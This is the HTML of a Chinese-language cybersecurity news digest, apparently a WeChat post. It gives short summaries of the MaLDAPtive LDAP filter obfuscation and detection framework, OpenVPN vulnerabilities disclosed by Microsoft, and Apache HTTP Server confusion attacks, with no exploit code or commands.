	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.49444444444444446" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=54515d42&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTP1CxjMO78BiaKml78UXtLnOtE3iamGibYmBAO2mcZVKDJmchsic5FoUySBA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.9462962962962963" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=7830e7af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTP72WFaW0JBUQWJ3WxEu8BGtkr9yQVAxZyjYeIibhic9cMINSlgpVRU4tQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.9120370370370371" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=eb9ac204&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPCh8NFDsib1cYqWH27UE82peodNibEiaWzcnbmFtHQkUTdJ47ibbKCE7ic7A%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">MaLDAPtive框架：LDAP搜索过滤器解析、混淆、解混淆和检测</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Black Hat 和 Defcon 会议精彩回顾</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPslibbHENZwKiaajeiaibkaufyZ2fZH4vsamjWpJ8NicKswyNmFbtgH9Njuw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPslibbHENZwKiaajeiaibkaufyZ2fZH4vsamjWpJ8NicKswyNmFbtgH9Njuw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844185452228428"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">MaLDAPtive 的开发团队强调了对于防御者在面对 LDAP 相关威胁时的需求，通过分阶段的框架发布，他们希望防御者能够有足够的时间来设置必要的监控和检测规则。他们认为，通过提供一个完整的框架，可以帮助安全专业人员更好地理解和应对 LDAP SearchFilter 的混淆技术。MaLDAPtive 的设计理念是提供一个强大、灵活且易于使用的工具，以便在实际操作中能够快速响应和检测恶意的 LDAP SearchFilter。此外，开发者还强调了在实验室环境中收集 LDAP 遥测的重要性，并提供了一个用于安装、配置和查询 LDAP 遥测的模块，以帮助安全研究人员在不影响生产环境的情况下进行测试。</section></li></ul>
	<br/>
	<p>🏷️: LDAP, 解析器, 混淆, 网络安全, C#</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x09
			 OpenVPN漏洞被发现可导致远程代码执行和权限提升</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">微软研究人员发现了多个OpenVPN中等严重性的漏洞，这些漏洞可以被链式利用以实现远程代码执行（RCE）和本地权限提升（LPE），可能导致数据泄露、系统被破坏和未授权访问敏感信息。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.6068965517241379" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="870" src="https://wechat2rss.xlab.app/img-proxy/?k=a534a82f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPfN6ltmBAKmUkwAhpT0EQ7yUIZrlL1z1HqMRLico1rbicuOogwIGuNMNg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软威胁情报博客发布关于漏洞利用的最新文章</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软发现OpenVPN多个漏洞，可导致远程代码执行和本地提权</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPS7ibSzIVTZ5icGsD65c4nP7FUB44gZxhibcbEQ2wpxxXztZbb99RVZ8Ng/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPS7ibSzIVTZ5icGsD65c4nP7FUB44gZxhibcbEQ2wpxxXztZbb99RVZ8Ng/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855182524184512"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">OpenVPN是一个广泛使用的开源VPN解决方案，被集成到各种设备中，包括路由器、固件、PC、移动设备等。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者需要用户认证和对OpenVPN内部工作机制以及操作系统的深入了解来利用这些漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软在Black Hat USA 2024上展示了这些漏洞的研究成果和攻击链的演示。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软提供了关于如何修补这些漏洞以及如何减轻和检测试图利用这些漏洞的威胁的指导。</section></li></ul>
	<br/>
	<p>🏷️: OpenVPN, 漏洞, 远程代码执行, 权限提升, 数据泄露</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0a
			 Apache HTTP服务器中的混淆攻击漏洞分析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文主要探讨了Apache HTTP Server中存在的Confusion Attacks，即利用模块间对请求处理结构的理解不一致进行的攻击，并揭示了多个漏洞和利用技术。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1.1378977820636451" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1037" src="https://wechat2rss.xlab.app/img-proxy/?k=4a8b6b48&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPxZFKHy0YkkULreJpoon8fNUncOHVHgqJUTDQfvBFvBBXVC3mVR7IeA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.562962962962963" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=0be7bccf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPDvTupyUQtrnld96lxYq5IgL8V6kBR1bSpvI2AFOF4rLDMCdWfD5WBw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.562962962962963" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=6c461926&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZm3z7q1TPvLib48LK4zo4icTPn2o9kXhqNK0WML3EMfQVI6VzImBlU2YW7JbYLt1bGaWBT4uN2vvGLA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Apache HTTP 服务器中的语义混淆攻击：利用隐藏的歧义</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPZ2dVDWXgWqPw7wziaWAeUpXXDVPfW5br8Byiamlic0ebBNNAQQtR1tWUQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZm3z7q1TPvLib48LK4zo4icTPZ2dVDWXgWqPw7wziaWAeUpXXDVPfW5br8Byiamlic0ebBNNAQQtR1tWUQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522854215511112"></mp-common-miniprogram>
	</section>
